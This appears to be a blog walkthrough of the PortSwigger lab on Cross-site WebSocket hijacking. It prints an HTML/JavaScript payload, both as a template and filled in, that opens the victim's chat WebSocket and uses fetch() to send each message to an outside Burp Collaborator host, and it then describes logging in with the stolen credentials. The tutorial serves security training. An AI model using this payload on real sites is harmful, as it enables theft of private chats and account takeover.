Introduction
Hello, how are you all doing? Today we are writing an article on WebSockets vulnerabilities. This is our third article on WebSocket vulnerabilities. In this article, we will cover the Cross-site WebSocket hijacking lab from PortSwigger Web Security. We will provide a complete step-by-step practical guide to help you understand it better.
Lab Description
This lab features a live chat with WebSockets being used. To solve the lab, you need to host an HTML/JavaScript payload on the exploit server. This payload will perform a cross-site WebSocket hijacking attack to exfiltrate the victim’s chat. You can gain access to the victim’s account and log in as them.
Lab Solution
First, access the lab. After accessing it, click on the live chat while keeping Burp Suite open and the proxy enabled. This will allow you to analyze the traffic easily using the HTTP history in Burp.
Now, add some random wording in the live chat or have a conversation, then refresh the page. This will generate a GET /chat request.
<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>We will use this code since we want to perform Cross-site WebSocket hijacking and fetch the data to our Burp Collaborator. In the above script or payload, we will make some modifications. Copy the URL of the request with the /chat name and replace the second line with that URL. Also, replace the payload for the Burp Collaborator in the 7th line.
Here is the final version:
<script>
var ws = new WebSocket('wss://0aba009e0317a9d5827751eb00390009.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://l8u4670sxsrzg7tmasph6jovimocc1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>Replace ‘your-websocket-url’ with your case-specific Burp Collaborator payload.
After clicking on the exploit server in the lab, paste your payload into the body section and click on “Store” to save it. Now, click on “View exploit”.
After clicking on “View exploit”, you will receive some requests that need to be checked.
You can check that you have obtained the username and password, but they are encoded. To decode them, simply paste them into the Burp Decoder and click on “Smart Decode”.
You can see that I have obtained the username and password. Now, I will proceed with logging in.
After logging into Carlos’s account, we have successfully solved the PortSwigger Web Security lab on Cross-site WebSocket hijacking.
In the next article, we will cover the lab “User ID controlled by request parameter” from PortSwigger Web Security, providing a practical step-by-step solution.
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
